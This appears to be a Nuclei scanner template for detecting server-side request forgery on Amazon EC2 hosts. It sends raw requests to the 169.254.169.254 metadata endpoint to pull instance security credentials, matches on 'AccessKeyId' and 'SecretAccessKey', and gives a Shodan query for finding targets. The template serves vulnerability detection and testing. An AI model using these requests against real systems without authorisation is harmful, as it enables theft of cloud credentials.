id: amazon-ec2-ssrf info: name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 metadata: max-request: 2 verified: true shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon http: - raw: - |+ GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 Host: {{Hostname}} - |+ @tls-sni: {{Hostname}} GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true unsafe: true matchers-condition: and matchers: - type: word part: body words: - "AccessKeyId" - "SecretAccessKey" condition: and - type: status status: - 200